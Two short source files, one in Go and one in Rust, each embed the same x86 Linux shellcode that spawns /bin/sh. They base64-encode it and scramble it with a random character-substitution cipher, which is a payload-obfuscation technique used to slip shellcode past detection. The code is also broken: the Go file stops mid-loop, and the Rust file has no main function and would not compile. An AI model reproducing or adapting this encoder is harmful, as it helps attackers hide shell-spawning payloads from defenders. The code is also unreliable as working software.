File: encoder.go
package main

import (
    "encoding/base64"
    "math/rand"
    "time"
)

func main() {
    // Define the shellcode to encode
    shellcode := []byte{0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50, 0x89, 0xe2, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80}

    // Encode the shellcode with base64
    encoded := base64.StdEncoding.EncodeToString(shellcode)

    // Create a list of random characters
    chars := make([]rune, 94)
    for i := range chars {
        chars[i] = rune(i + 33)
    }
    rand.Seed(time.Now().UnixNano())
    rand.Shuffle(len(chars), func(i, j int) {
        chars[i], chars[j] = chars[j], chars[i]
    })

    // Create a dictionary of character substitutions
    subs := make(map[rune]rune)
    for i,

File: encoder.rs
use base64;
use rand::seq::SliceRandom;

// Define the shellcode to encode
let shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

// Encode the shellcode with base64
let encoded = base64::encode(shellcode);

// Create a list of random characters
let mut chars: Vec<char> = (33..127).map(|i| i as char).collect();
chars.shuffle(&mut rand::thread_rng());

// Create a dictionary of character substitutions
let subs: std::collections::HashMap<char, char> = chars
    .iter()
    .enumerate()
    .map(|(i, c)| (*c, (i as u8 + 33) as char))
    .collect();

// Substitute the characters in the encoded shellcode
let substituted: String = encoded
    .chars()
    .map(|c| subs.get(&c).unwrap())
    .collect();

// Print the encoded and substituted shellcode
println!("Encoded: {}", encoded);
println!("Substituted: {}", substituted);
